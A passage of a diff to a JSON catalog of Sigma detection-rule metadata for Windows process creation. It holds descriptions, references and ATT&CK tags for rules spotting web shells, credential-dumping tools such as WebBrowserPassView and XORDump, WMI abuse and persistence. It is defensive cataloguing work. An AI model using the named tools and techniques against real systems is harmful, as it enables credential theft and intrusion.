"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/09/14", - "filename": "proc_creation_win_weak_or_abused_passwords.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of WebBrowserPassView.exe", - "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", - "value": "Launch WebBrowserPassView Executable", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.003" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_webbrowserpassview.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "value": "Chopper Webshell Process Pattern", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_webshell_chopper.yml", - "author": "Florian Roth (rule), MSTI (query)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", - "value": "Webshell Detection With Command Line Keywords", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], - "creation_date": "2017/01/01", - "filename": "proc_creation_win_webshell_detection.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "value": "Webshell Hacking Activity Patterns", - "meta": { - "refs": [ - "https://youtu.be/7aemGhaE9ds?t=641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], - "creation_date": "2022/03/17", - "filename": "proc_creation_win_webshell_hacking.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", - "value": "Webshell Recon Detection Via CommandLine & Processes", - "meta": { - "refs": [ - "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2020/07/22", - "filename": "proc_creation_win_webshell_recon_detection.yml", - "author": "Cian Heasley, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", - "value": "Shells Spawned by Web Servers", - "meta": { - "refs": [ - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_webshell_spawn.yml", - "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Particular web applications may spawn a shell process legitimately" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", - "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "value": "Usage Of Web Request Commands And Cmdlets", - "meta": { - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", - "author": "James Pemberton / @4A616D6573", - "level": "medium", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the wevtutil utility to perform reconnaissance", - "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "value": "Wevtutil Recon", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_wevtutil_recon.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitmate usage of the utility by administrators to query the event log" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", - "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "value": "Run Whoami as Privileged User", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://nsudo.m2team.org/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/01/28", - "filename": "proc_creation_win_whoami_as_priv_user.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", - "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", - "value": "Run Whoami as SYSTEM", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_whoami_as_system.yml", - "author": "Teymur Kheirkhabarov, Florian Roth", - "level": "high", - "falsepositive": [ - "Possible name overlap with NT AUHTORITY substring to cover all languages" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.", - "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", - "value": "Run Whoami Showing Privileges", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2021/05/05", - "filename": "proc_creation_win_whoami_priv.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity (rare lookups on current privileges)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", - "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "value": "Windows 10 Scheduled Task SandboxEscaper 0-day", - "meta": { - "refs": [ - "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "creation_date": "2019/05/22", - "filename": "proc_creation_win_win10_sched_task_0day.yml", - "author": "Olaf Hartong", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "value": "Suspicious WindowsTerminal Child Processes", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", - "https://twitter.com/nas_bench/status/1550836225652686848", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence" - ], - "creation_date": "2022/07/25", - "filename": "proc_creation_win_windows_terminal_susp_children.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Other legitimate \"Windows Terminal\" profiles" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "value": "Detect Execution of winPEAS", - "meta": { - "refs": [ - "https://github.com/carlospolop/PEASS-ng", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_winpeas_tool.yml", - "author": "Georg Lauenstein", - "level": "high", - "falsepositive": [ - "Other programs that use the same command line flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Installation of a Exchange Transport Agent", - "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", - "value": "MSExchange Transport Agent Installation", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], - "creation_date": "2021/06/08", - "filename": "proc_creation_win_win_exchange_transportagent.yml", - "author": "Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", - "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "value": "Suspicious Get ComputerSystem Information with WMIC", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/09/08", - "filename": "proc_creation_win_wmic_computersystem_recon.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", - "value": "Suspicious Get Local Groups Information with WMIC", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/12", - "filename": "proc_creation_win_wmic_group_recon.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", - "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", - "value": "WMIC Hotfix Recon", - "meta": { - "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_wmic_hotfix_enum.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", - "uuid": "221b251a-357a-49a9-920a-271802777cc0", - "value": "Suspicious WMI Reconnaissance", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_wmic_reconnaissance.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary might use WMI to execute commands on a remote system", - "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", - "value": "WMI Remote Command Execution", - "meta": { - "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/03/13", - "filename": "proc_creation_win_wmic_remote_command.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", - "value": "WMI Reconnaissance List Remote Services", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_wmic_remote_service.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Uninstall an application with wmic", - "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", - "value": "WMI Uninstall An Application", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/01/28", - "filename": "proc_creation_win_wmic_remove_application.yml", - "author": "frac113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of wmic to start or stop a service", - "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", - "value": "WMIC Service Start/Stop", - "meta": { - "refs": [ - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_wmic_service.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", - "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "value": "WMIC Unquoted Services Path Lookup", - "meta": { - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_win_wmic_unquoted_service_search.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmiprvse spawning processes", - "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "value": "Wmiprvse Spawning Process", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2019/08/15", - "filename": "proc_creation_win_wmiprvse_spawning_process.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "value": "WMI Backdoor Exchange Transport Agent", - "meta": { - "refs": [ - "https://twitter.com/cglyer/status/1182389676876980224", - "https://twitter.com/cglyer/status/1182391019633029120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2019/10/11", - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI script event consumers", - "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", - "value": "WMI Persistence - Script Event Consumer", - "meta": { - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "creation_date": "2018/03/07", - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMI spawning a PowerShell process", - "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "value": "WMI Spawning Windows PowerShell", - "meta": { - "refs": [ - "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "creation_date": "2019/04/03", - "filename": "proc_creation_win_wmi_spwns_powershell.yml", - "author": "Markus Neis / @Karneades", - "level": "high", - "falsepositive": [ - "AppvClient", - "CCM" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "value": "Microsoft Workflow Compiler", - "meta": { - "refs": [ - "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_workflow_compiler.yml", - "author": "Nik Seetharaman, frack113", - "level": "high", - "falsepositive": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", - "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", - "value": "UEFI Persistence Via Wpbbin - ProcessCreation", - "meta": { - "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ], - "creation_date": "2022/07/18", - "filename": "proc_creation_win_wpbbin_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "value": "Write Protect For Storage Disabled", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2021/06/11", - "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", - "value": "Wscript Shell Run In CommandLine", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/08/31", - "filename": "proc_creation_win_wscript_shell_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate inline scripting by some administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", - "value": "Wsudo Suspicious Execution", - "meta": { - "refs": [ - "https://github.com/M2Team/Privexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" - ], - "creation_date": "2022/12/02", - "filename": "proc_creation_win_wsudo_susp_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "value": "Wusa Extracting Cab Files", - "meta": { - "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/04", - "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "value": "Wusa Extracting Cab Files From Suspicious Paths", - "meta": { - "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://www.echotrail.io/insights/search/wusa.exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/05", - "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of XORDump process memory dumping utility", - "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "value": "XORDump Use", - "meta": { - "refs": [ - "https://github.com/audibleblink/xordump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/28", - "filename": "proc_creation_win_xordump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Another tool that uses the command line switches of XORdump" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", - "value": "XSL Script Processing", - "meta": { - "refs": [ - 